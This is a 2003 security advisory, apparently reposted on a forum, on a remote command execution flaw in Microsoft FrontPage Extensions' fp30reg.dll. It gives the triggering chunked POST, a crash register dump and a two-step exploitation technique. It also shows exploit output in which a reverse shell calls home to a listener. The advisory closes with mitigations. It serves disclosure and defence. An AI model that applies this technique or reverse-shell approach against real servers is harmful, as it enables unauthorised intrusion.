Frontpage Extensions Remote Command execut1on
========================================================================
= Frontpage Extensions Remote Command execut1on
=
= MS Bulletin posted:
= http ://www.microsoft.com/technet/security/bulletin/ms03-051.asp
=
= Affected Software:
= Microsoft Windows 2000 Service Pack 2, Service Pack 3
= Microsoft Windows XP, Microsoft Windows XP Service Pack 1
= Microsoft Office XP, Microsoft Office XP Service Release 1
=
= Public disclosure on November 11, 2003
========================================================================
Continuing 'The Methodical Approach To Finding Overflows' we moved to
the next attack avenue. After the success against nsiislog.dll we were
again greeted by an access violation message leading to the discovery
of another remote vulnerability.
== Description ==
Sending a chunked encoded post to fp30reg.dll will cause an access
violation resulting in the following error log.
------------------------------------------------------------------------
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 37
Description:
Out of process application '/LM/W3SVC/1/ROOT' terminated unexpectedly.
------------------------------------------------------------------------
A chunked encoded post will result in the control of ECX and EDI, with
the exception occurring at a mov dword ptr [ECX+4],EDI instruction leading
to remote command execut1on with privileges associated with the
IWAM_machinename account.
== Chunked Transfer-Encoding Post ==
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
Transfer-Encoding: chunked
PostLength
PostData
0
== Exploitation ==
[Code Segment]
67D46AD3 mov ecx,dword ptr [ebx+edx+8]
67D46AD7 mov edi,dword ptr [ebx+edx+4]
67D46ADB mov dword ptr [ecx+4],edi
[Registers]
EAX = 046F83E8 EBX = 00000010 ECX = 58585858
EDX = 05450FEC ESI = 0000000C EDI = 58585858
EIP = 67D46ADB ESP = 0120F648 EBP = 0120F668
[EDX DUMP]
05450FEC 11 00 00 00 58 58 58 ....XXX
05450FF3 58 58 58 58 58 58 58 XXXXXXX
05450FFA 58 58 58 58 58 58 58 XXXXXXX
05451001 58 58 58 58 58 58 58 XXXXXXX
05451008 58 58 58 58 58 58 58 XXXXXXX
0545100F 58 58 58 58 58 58 58 XXXXXXX
05451016 58 58 58 58 58 58 58 XXXXXXX
Many different ways to exploit this malloc/free scenario, so instead of
the usual SEH redirect to a JMP instruction, we took a two step approach
for higher reliability.
At the first exception error we are in control of ECX and EDI allowing
us to write our JMP instruction to a known writeable space. This does
not cause an exception and execut1on flow continues through to a CALL
instruction that uses a value from our buffer. We use this CALL to
reach our JMP instruction.
== Exploit Example ==
%:\>exploit 192.168.1.63
** FP30REG.DLL - Ver 4.0.2.5526 - Remote Shell **
. Calling Home: blackhole:2000
. Using: 0x---------h as writeable data space
. Shellcode Size: 304 bytes
. Preparing Exploit Buffer......Ready
. Starting Listener On Port: 2000
. Connecting To 192.168.1.63
. Sending Exploit......Exploit Sent
. Connection Received
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
IWAM_BLACKHOLE
C:\WINNT\system32>
== Solutions ==
- Every day is a 0-day day on the Internet. Limiting the avenues of attack
can be a key factor in reducing the risk to a web server. Programs such
as secureIIS and URLscan should be setup to reduce the number of methods
that can be used to send data to a server. Removing unnecessary services,
files and isapi extensions reduces the number of listeners that data can
be fed to limiting the number of vulnerabilities that a server is
susceptible to.
- Install the vendor supplied patch.
== Credit ==
Discovered and advised to Microsoft January 30, 2003 by Brett Moore of
Security-Assessment.com
Reply With Quote
Social Networking Bookmarks